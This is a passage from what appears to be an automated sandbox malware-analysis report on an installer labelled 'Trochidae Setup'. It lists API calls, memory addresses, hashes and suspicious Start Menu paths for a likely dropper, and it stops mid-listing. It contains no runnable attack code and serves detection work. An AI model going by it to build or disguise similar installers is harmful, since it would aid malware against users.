RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00405EB7

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction ID: 95beb03159e1ed36dc188c03c0911f4594c5194c551a9f11594fd4679c6f4357
Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
Instruction Fuzzy Hash: 23E0ECB2014109BEEF095F90ED0ADBB371DEB04315F00492EFA06E4090E7B5A920AA75

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405C2E

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction ID: 28dd51bc99cbbe9e43bc3b4155210361b58306b45153a5fd00399a3e640b4bcc
Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
Instruction Fuzzy Hash: 3AE0EC3261835AABEF249E559C01EEB7B6CEB05360F044472FD15E6150D231E8219FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405BEB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405BFF

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction ID: 7d11c2845e787d99b8eae26fbbcce04266139d1862b3a193897eab19ac9c5e73
Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
Instruction Fuzzy Hash: 72E0E632558759ABDF106E559C00AEB775CEB45754F004832FE15E3150D231E8519BE9

Uniqueness

Uniqueness Score: -1.00%

Function 72BE2921 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(72BE404C,00000004,00000040,72BE403C), ref: 72BE293F

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6b639b1631e3a41f39713d910e8caefc7f08b6b2da29fc08a515396a1ac554d5
Instruction ID: d987c0d98c12b2eb65ca3297c6a217278e321ef906a9cebf6d4a964e201f0182
Opcode Fuzzy Hash: 6b639b1631e3a41f39713d910e8caefc7f08b6b2da29fc08a515396a1ac554d5
Instruction Fuzzy Hash: 42F092B3D88281DEC3B1CF7A84447053FF0A318295F224D3EE599D7243E33840448B15

Uniqueness

Uniqueness Score: -1.00%

Function 004023A7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
Instruction ID: 87433fbf28b19ed2e9e97c64dce3a42f5842ec6a66e9b0e36d30645c49e8dc10
Opcode Fuzzy Hash: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
Instruction Fuzzy Hash: 92E01230904309BAEB02AFB08D09EBE3E79EF05710F10042AB9606A0D2E6B89542D75E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E60 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(00000000,?,00000000,?,?), ref: 00405E84

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction ID: 31d842323d9a2f535784a2c12e989c9eb1b9f9f44251d53ba3eec0f14c414acf
Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
Instruction Fuzzy Hash: 75D0EC3204420DBADF115F90ED05FAB371DEB14355F004522FE05A4090D2769520AA55

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
Instruction ID: d5005c83e4bc13d794db0995845c4037c46dc405a88debeb1123cd551caf7fcc
Opcode Fuzzy Hash: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
Instruction Fuzzy Hash: F5D05BB2B08200EBCB11DFE8EF08A5E77B5EB54325F204577E101F21D1D2B88641975A

Uniqueness

Uniqueness Score: -1.00%

Function 004040B4 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 004040C6

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: d19a9dbcf4508c1e9b2ca47d0762ffb16ec5c10abf7e35186d5f4f0c6b5da105
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: F9C04C71754201BAEA319B50DD49F0777586750B00F5584257314F60D1C6B4E451D62D

Uniqueness

Uniqueness Score: -1.00%

Function 004031ED Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040409D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 004040AB

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004056BC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,004044AF,?), ref: 004056CB

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A

Uniqueness

Uniqueness Score: -1.00%

Function 0040408A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E66), ref: 00404094

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

Uniqueness

Uniqueness Score: -1.00%

Function 72BE1215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,72BE1233,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE121D

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: feed3716df8a3bcb49e9267c54c013e1c246bc60679a75b1b3684e07f2787ff6
Instruction ID: cd02e973c50056cb8e0b7e8d33e8e6b21dadecc86c39e7b9c183e341860647f4
Opcode Fuzzy Hash: feed3716df8a3bcb49e9267c54c013e1c246bc60679a75b1b3684e07f2787ff6
Instruction Fuzzy Hash: 90A00172D84100DADEA29AE2894AB243A21A748B81F208858E31556196867940149B25

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004044FA Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404549
SetWindowTextA.USER32(00000000,?), ref: 00404573
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404624
CoTaskMemFree.OLE32(00000000), ref: 0040462F
lstrcmpiA.KERNEL32(Call,Trochidae Setup: Installing,00000000,?,?), ref: 00404661
lstrcatA.KERNEL32(?,Call), ref: 0040466D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040467F

Part of subcall function 004056DA: GetDlgItemTextA.USER32 ref: 004056ED

Part of subcall function 00406244: CharNextA.USER32(?), ref: 0040629C
Part of subcall function 00406244: CharNextA.USER32(?), ref: 004062A9
Part of subcall function 00406244: CharNextA.USER32(?), ref: 004062AE
Part of subcall function 00406244: CharPrevA.USER32(?,?), ref: 004062BE

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040473D
MulDiv.KERNEL32 ref: 00404758

Part of subcall function 004048B1: lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
Part of subcall function 004048B1: wsprintfA.USER32 ref: 00404957
Part of subcall function 004048B1: SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A

Strings

A, xrefs: 0040461D
Call, xrefs: 0040465B, 00404660, 0040466B
jl-, xrefs: 004047B4
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens, xrefs: 0040464A
Trochidae Setup: Installing, xrefs: 004045F7, 0040465A

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Trochidae Setup: Installing$jl-
API String ID: 2624150263-1779906304
Opcode ID: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
Instruction ID: a574bab901635a86c0a25b0ea1efcbf713871747dcedb108b051a9d89a4042ab
Opcode Fuzzy Hash: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
Instruction Fuzzy Hash: E9A16FB1900219ABDB11EFA5CD41AAFB7B8EF85315F10843BF601B62D1D77C8A418F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407410,?,00000001,00407400,?), ref: 004021BA
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 004021FA

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
API String ID: 123533781-1636881305
Opcode ID: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
Instruction ID: 364dec1ee03e4b34996bd20462589a1769652030a90c2beac7f749610b7a86d9
Opcode Fuzzy Hash: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
Instruction Fuzzy Hash: 30511871E00209AFCB00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402765 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
